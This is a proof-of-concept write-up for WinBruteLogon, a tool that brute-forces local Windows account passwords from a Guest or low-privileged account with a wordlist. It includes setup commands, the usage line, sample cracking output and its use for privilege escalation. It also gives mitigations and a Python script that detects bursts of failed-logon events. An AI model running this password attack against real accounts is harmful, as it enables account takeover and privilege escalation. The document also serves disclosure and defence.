Release date: 2020-05-14
Target: Windows XP to Latest Windows 10 Version (1909)
Weakness location: LogonUserA, LogonUserW, CreateProcessWithLogonA, CreateProcessWithLogonW
This PoC demonstrates what I would call a serious weakness in the Microsoft Windows authentication mechanism rather than a vulnerability.
The biggest issue is the lack of privilege required to perform such actions.
Indeed, from a Guest account (the most limited account on Microsoft Windows), you can crack the password of any available local user.
Find out which users exist with the command: net user
This PoC uses multithreading to speed up the process and supports both 32- and 64-bit.
Tested on Windows 10
Install and configure a freshly updated Windows 10 virtual or physical machine.
In my case the full Windows version was: 1909 (OS Build 18363.778)
Log on as administrator and create two different accounts: one administrator and one regular user. Both users are local.
/!\ Important notice: I used the Guest account for the demo, but this PoC is not limited to the Guest account; it will work from any account / group (guest user / regular user / admin user etc.)
net user darkcodersc /add
net user darkcodersc trousers
(trousers is the password)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm
(ozlq6qwm is the password)
net user Guest /add /active:yes
net localgroup users Guest /delete
net user Guest /add /active:yes
In my case both trousers and ozlq6qwm are in SecLists: https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Logoff from administrator account or restart your machine and log to the Guest account.
Place the PoC executable anywhere you have access as Guest user.
Usage: WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v is optional; it enables verbose mode.
By default, the domain name is the value of the %USERDOMAIN% environment variable. You can specify a custom name with option -d
prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Wait a few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Wait a few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
If you gain access to a low-privileged user, you can crack the password of a more privileged user and escalate your privileges.
- Disable the Guest account(s) if present.
- Application whitelisting.
- Follow the guidelines for creating and keeping a strong password. Apply this to all users.
Open secpol.msc, then go to Account Policies > Account Lockout Policy and edit the value Account lockout threshold with the desired value (1 to 999).
The value represents the number of possible attempts before the account gets locked.
/!\ The Account Lockout Policy won't work on the Administrator account. At this moment, the best protection for the Administrator account (if enabled) is to set up a very complex password.
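Because lockout does not cover the Administrator account, detection is the remaining control. The following is an added example written for this page (not code from the WinBruteLogon project): with logon failure auditing enabled, every failed LogonUser call is recorded as Security event 4625 on the machine, so a wordlist run appears as a burst of 4625 events for one TargetUserName; the script runs a sliding-window counter over a constructed sample of such events. The threshold and window values are assumptions to tune per environment.

```python
"""Flag local brute-force bursts in Windows Security event 4625 records.

Each failed LogonUser()/CreateProcessWithLogon() call logs Event ID 4625
("An account failed to log on") when logon failure auditing is enabled.
A wordlist run therefore shows thousands of 4625 events for a single
TargetUserName within seconds, which a sliding-window counter catches
even for accounts that lockout policy does not protect.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the shape (timestamp, TargetUserName, LogonType,
# WorkstationName) as Get-WinEvent would expose them. The 12 failures on
# "darkcodersc" mimic the PoC run; "HackMe" shows two ordinary typos.
BASE = datetime(2020, 5, 14, 10, 0, 0)
SAMPLE_4625 = [
    ((BASE + timedelta(seconds=i)).isoformat(), "darkcodersc", 2, "DESKTOP-0885FP1")
    for i in range(12)
] + [
    ((BASE + timedelta(minutes=5)).isoformat(), "HackMe", 2, "DESKTOP-0885FP1"),
    ((BASE + timedelta(minutes=6, seconds=30)).isoformat(), "HackMe", 2, "DESKTOP-0885FP1"),
]


def detect_bursts(events, threshold=10, window_seconds=60):
    """Return {user: {failures, first, last, workstation}} for every user
    whose 4625 count reaches `threshold` inside any `window_seconds` span.
    Threshold/window are assumed values, not a Windows default."""
    alerts = {}
    recent = defaultdict(deque)   # per-user timestamps still in the window
    totals = defaultdict(int)     # per-user failures seen so far
    first_seen = {}
    for ts_str, user, _logon_type, workstation in sorted(events):
        ts = datetime.fromisoformat(ts_str)
        key = user.lower()        # Windows user names are case-insensitive
        totals[key] += 1
        first_seen.setdefault(key, ts)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=window_seconds):
            q.popleft()           # drop failures older than the window
        if len(q) >= threshold:
            alerts[key] = {"failures": totals[key],
                           "first": first_seen[key].isoformat(),
                           "last": ts.isoformat(),
                           "workstation": workstation}
    return alerts


if __name__ == "__main__":
    for user, info in detect_bursts(SAMPLE_4625).items():
        print(f"[ALERT] {user}: {info['failures']} failed logons "
              f"between {info['first']} and {info['last']} on {info['workstation']}")
```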
A report was sent to the Microsoft Security Team.
They should at least enable account lockout by default; currently it is not.